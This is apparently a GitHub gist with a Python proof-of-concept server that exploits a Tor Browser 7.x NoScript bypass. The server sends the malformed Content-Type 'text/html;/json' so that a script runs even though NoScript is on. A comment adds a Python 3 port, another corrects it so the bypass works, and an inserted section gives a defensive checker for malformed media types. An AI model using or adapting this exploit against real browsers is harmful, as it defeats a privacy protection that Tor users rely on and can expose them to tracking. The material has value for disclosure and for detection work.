@x0rz
Last active November 10, 2021 13:24
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

    #Handler for the GET requests
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type','text/html;/json') # Here is where the magic happens
        self.end_headers()
        self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
        return

try:
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print 'Started httpserver on port ' , PORT_NUMBER
    server.serve_forever()

except KeyboardInterrupt:
    print '^C received, shutting down the web server'
    server.socket.close()
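
The only unusual element in the PoC is the Content-Type value `text/html;/json`, whose second segment is not a valid `name=value` parameter. As an added example (not part of the gist), here is a strict check against the RFC 9110 media-type grammar that a proxy rule or log-review script could use to flag such values; the function names and sample header values are constructed for illustration.

```python
import re

# RFC 9110 "token" characters; note that "/" and ";" are not among them.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
MEDIA_TYPE_RE = re.compile(f"({TOKEN})/({TOKEN})")
PARAM_RE = re.compile(f"{TOKEN}=(?:{TOKEN}|{QUOTED})")

# Constructed sample header values; the last one is the value the PoC sends.
SAMPLES = ["text/html", "text/html; charset=utf-8", "application/json",
           'multipart/form-data; boundary="a;b"', "text/html;/json"]


def split_segments(value):
    """Split a header value on ';' while leaving quoted strings intact."""
    parts, buf, in_quotes, escaped = [], "", False, False
    for ch in value:
        if ch == ";" and not in_quotes:
            parts.append(buf)
            buf = ""
            continue
        if in_quotes and ch == "\\" and not escaped:
            escaped = True
        else:
            if ch == '"' and not escaped:
                in_quotes = not in_quotes
            escaped = False
        buf += ch
    parts.append(buf)
    return [p.strip(" \t") for p in parts]


def check_content_type(value):
    """Return (type/subtype or None, list of grammar problems)."""
    first, *params = split_segments(value)
    match = MEDIA_TYPE_RE.fullmatch(first)
    problems = [] if match else [f"invalid type/subtype: {first!r}"]
    # Empty segments (e.g. a trailing ';') are tolerated, as RFC 9110 allows.
    problems += [f"malformed parameter: {p!r}" for p in params
                 if p and not PARAM_RE.fullmatch(p)]
    return (match.group(0).lower() if match else None), problems


def flag_suspicious(values):
    """Keep only the values that do not parse as a clean media type."""
    return [v for v in values if check_content_type(v)[1]]
```
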
@sparskakyl

2 hacky wacky 4 me

@brammittendorff

brammittendorff commented Sep 10, 2018

Python3 version:

#!/usr/bin/python
from http.server import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port %s' % PORT_NUMBER)
        server.serve_forever()

except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()

@jorgeluengar

@brammittendorff many thanks in advance for the Python3 version, but there is a small mistake regarding the exploit:
It must use:
self.send_header('Content-type','text/html;/json')
instead of
self.send_header('Content-type','text/html')

Tested on Tor 7.5.2

Thanks!

@brammittendorff

@jorgeluengar you are right, fixed my comment thanks!
